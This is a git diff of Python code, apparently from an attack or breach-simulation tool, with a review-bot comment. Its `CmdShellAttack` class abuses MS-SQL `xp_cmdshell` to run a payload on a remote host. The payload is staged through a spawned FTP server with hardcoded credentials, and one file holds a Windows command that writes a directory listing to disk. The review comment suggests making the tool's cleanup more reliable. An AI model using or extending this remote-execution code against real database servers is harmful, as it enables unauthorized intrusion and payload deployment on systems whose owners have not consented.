* Finalized the MS-SQL code
* Changed the log to the right handle and added exception info.
* Better docs and some PEP 8 cleanup
parent
149525d205
commit
b46810e02b
|
@ -1,5 +1,6 @@
|
|||
from os import path
|
||||
import logging
|
||||
|
||||
import pymssql
|
||||
|
||||
import mssqlexec_utils
|
||||
|
|
|
@ -1,4 +1,3 @@
|
|||
|
||||
import os
|
||||
import multiprocessing
|
||||
import logging
|
||||
|
@ -11,12 +10,17 @@ from pyftpdlib.handlers import FTPHandler
|
|||
from pyftpdlib.servers import FTPServer
|
||||
|
||||
|
||||
__author__ = 'Maor Rayzin'
|
||||
|
||||
|
||||
FTP_SERVER_PORT = 1026
|
||||
FTP_SERVER_ADDRESS = ''
|
||||
FTP_SERVER_USER = 'brute'
|
||||
FTP_SERVER_PASSWORD = 'force'
|
||||
FTP_WORKING_DIR = '.'
|
||||
|
||||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class FTP:
|
||||
|
||||
|
@ -131,12 +135,12 @@ class CmdShellAttack(AttackHost):
|
|||
for cmd in shellcmds:
|
||||
self.cursor.execute(cmd)
|
||||
except Exception, e:
|
||||
logging.error('Error sending the payload using xp_cmdshell to host: {0}'.format(e.message))
|
||||
LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
|
||||
self.ftp_server_p.terminate()
|
||||
return False
|
||||
return True
|
||||
else:
|
||||
logging.error("Couldn't establish an FTP server for the dropout")
|
||||
LOG.error("Couldn't establish an FTP server for the dropout")
|
||||
return False
|
||||
|
||||
def execute_payload(self):
|
||||
|
@ -151,27 +155,27 @@ class CmdShellAttack(AttackHost):
|
|||
# Getting the payload's file name
|
||||
payload_file_name = os.path.split(self.payload_path)[1]
|
||||
|
||||
# Preparing the cmd to run on remote, using no_output so i can capture exit code: 0 -> success, 1 -> error.
|
||||
# Preparing the cmd to run on remote, using no_output so I can capture exit code: 0 -> success, 1 -> error.
|
||||
shellcmd = """DECLARE @i INT \
|
||||
EXEC @i=xp_cmdshell "chdir C:\\& C:\\tmp\\{0}", no_output \
|
||||
SELECT @i """.format(payload_file_name)
|
||||
|
||||
try:
|
||||
# Executing payload on remote host
|
||||
logging.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name))
|
||||
LOG.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name))
|
||||
self.cursor.execute(shellcmd)
|
||||
if self.cursor.fetchall()[0][0] == 0:
|
||||
# Success
|
||||
self.ftp_server_p.terminate()
|
||||
logging.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name))
|
||||
LOG.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name))
|
||||
return True
|
||||
else:
|
||||
logging.warning('Payload: {0} execution on remote host failed'.format(payload_file_name))
|
||||
LOG.warning('Payload: {0} execution on remote host failed'.format(payload_file_name))
|
||||
self.ftp_server_p.terminate()
|
||||
return False
|
||||
|
||||
except pymssql.OperationalError:
|
||||
logging.error('Executing payload: {0} failed'.format(payload_file_name))
|
||||
LOG.error('Executing payload: {0} failed'.format(payload_file_name), exc_info=True)
|
||||
self.ftp_server_p.terminate()
|
||||
return False
|
||||
|
||||
|
@ -189,10 +193,10 @@ class CmdShellAttack(AttackHost):
|
|||
multiprocessing.log_to_stderr(logging.DEBUG)
|
||||
p = multiprocessing.Process(target=ftp_s.run_server)
|
||||
p.start()
|
||||
logging.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
|
||||
LOG.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
|
||||
return ftp_s, p
|
||||
except Exception, e:
|
||||
logging.error('Exception raised while trying to pull up the ftp server: {0}'.format(e.message))
|
||||
LOG.error('Exception raised while trying to pull up the ftp server', exc_info=True)
|
||||
return None, None
|
||||
|
||||
def __find_own_ip(self):
|
||||
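Review bot: `execute_payload` stops the FTP server only on the three paths that call `self.ftp_server_p.terminate()` by hand, so any exception other than `pymssql.OperationalError` (an `IndexError` from `self.cursor.fetchall()[0][0]` on an empty result set, for instance) leaves the child process running. The constants near the top of this file give that server fixed credentials and an empty `FTP_SERVER_ADDRESS`, which presumably means it listens on every interface, so a leaked process keeps the operator's working directory exposed. Dropping the three calls and adding `finally:` followed by `self.ftp_server_p.terminate()` to the `try` covers every exit. The upload loop in the `-131,12 +135,12` hunk has the same shape, though its `try` starts outside the visible lines. In both `except Exception, e:` handlers the name `e` is unused now that the log calls pass `exc_info=True`.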
|
|
|
@ -0,0 +1 @@
|
|||
dir c:\>c:\tmp\dir.txt
|